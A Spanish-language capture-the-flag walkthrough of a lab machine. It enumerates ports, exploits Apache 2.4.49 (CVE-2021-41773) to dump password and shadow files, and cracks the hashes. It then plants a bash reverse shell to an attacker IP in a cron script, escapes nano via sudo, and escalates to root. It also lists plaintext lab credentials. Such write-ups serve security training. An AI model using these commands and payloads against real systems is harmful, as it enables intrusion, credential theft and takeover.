Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.43
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.43
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-13 18:49 -03
Nmap scan report for 192.168.1.43
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bc:95:83:6e:c4:62:38:b5:a9:94:0c:14:a3:bf:57:34 (RSA)
| 256 07:fa:46:1a:ca:f3:dc:08:2f:72:8c:e2:f2:2e:32:e5 (ECDSA)
|_ 256 46:ff:72:d5:67:c5:1f:87:b1:35:84:29:f3:ad:e8:3a (ED25519)
80/tcp open http Apache httpd 2.4.49 ((Unix))
|_http-server-header: Apache/2.4.49 (Unix)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Apaches
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.55 secondsEl robots.txt contiene una cadena en base64 (solo un mensaje de ánimo):
❯ cat robots.txt
User-agent: *
Disallow: /
# IOKAnFlvdSBrbm93IHlvdXIgcGF0aCwgY2hpbGQsIG5vdyBmb2xsb3cgaXQu4oCdCi0tIFBvY2Fob250YXMg
❯ echo "IOKAnFlvdSBrbm93IHlvdXIgcGF0aCwgY2hpbGQsIG5vdyBmb2xsb3cgaXQu4oCdCi0tIFBvY2Fob250YXMg" | base64 -d
“You know your path, child, now follow it.”
-- PocahontasEl servidor corre Apache 2.4.49, vulnerable a CVE-2021-41773. Lanzamos el exploit:
❯ searchsploit apache | grep 2.4.49
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
❯ python CVE-2021-41773.py -t 192.168.1.43
--------------------------------------------------------
| Apache2 2.4.49 - Exploit |
--------------------------------------------------------
>>>Volcamos /etc/passwd y /etc/shadow, los combinamos con unshadow y crackeamos con john:
❯ /opt/john/run/unshadow passwd shadow > unshadow.txt
❯ /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt unshadow.txt
...
iamtheone (squanto)Iniciamos sesión por SSH como squanto y obtenemos la primera flag. Revisamos nuestros grupos:
squanto@apaches:~$ id
uid=1001(squanto) gid=1001(squanto) groups=1001(squanto),1004(Lipan)Buscamos archivos del grupo Lipan y encontramos un script de backup que un cron (comentado pero activo) ejecuta como sacagawea:
squanto@apaches:~$ find / -group Lipan 2>/dev/null
/home/sacagawea/Scripts/backup.sh
squanto@apaches:/tmp$ cat /etc/crontab
...
#* 5 * * * * su sacagawea -c "./home/sacagawea/Scripts/backup.sh"
squanto@apaches:~$ ls -l /home/sacagawea/Scripts/backup.sh
-rwxrwx--- 1 sacagawea Lipan 182 Oct 10 2022 /home/sacagawea/Scripts/backup.shComo pertenecemos al grupo Lipan, podemos escribir el script; le añadimos una reverse shell:
squanto@apaches:/tmp$ echo '/bin/bash -i >& /dev/tcp/192.168.1.10/1234 0>&1' >> /home/sacagawea/Scripts/backup.shTras un par de minutos recibimos la shell de sacagawea:
❯ ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 192.168.1.43:40470.
bash: cannot set terminal process group (7685): Inappropriate ioctl for device
bash: no job control in this shell
sacagawea@apaches:~$Obtenemos la segunda flag y, en sus archivos, unas credenciales de varios usuarios:
$users = [
"geronimo" => "12u7D9@4IA9uBO4pX9#6jZ3456",
"pocahontas" => "y2U1@8Ie&OHwd^Ww3uAl",
"squanto" => "4Rl3^K8WDG@sG24Hq@ih",
"sacagawea" => "cU21X8&uGswgYsL!raXC"Probamos las de pocahontas con éxito (tercera flag) y revisamos sus permisos sudo:
pocahontas@apaches:~$ sudo -l
[sudo] password for pocahontas:
Matching Defaults entries for pocahontas on apaches:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pocahontas may run the following commands on apaches:
(geronimo) /bin/nanoPodemos ejecutar nano como geronimo; escapamos a una shell (GTFOBins) y obtenemos la cuarta flag:
pocahontas@apaches:~$ sudo -u geronimo nano
^R^X
reset; bash 1>&0 2>&0Finalmente, geronimo puede ejecutar cualquier comando como root:
geronimo@apaches:~$ sudo -l
Matching Defaults entries for geronimo on apaches:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User geronimo may run the following commands on apaches:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
geronimo@apaches:~$ sudo bash -p
root@apaches:/home/geronimo#Obtenemos nuestra última flag.
Fin.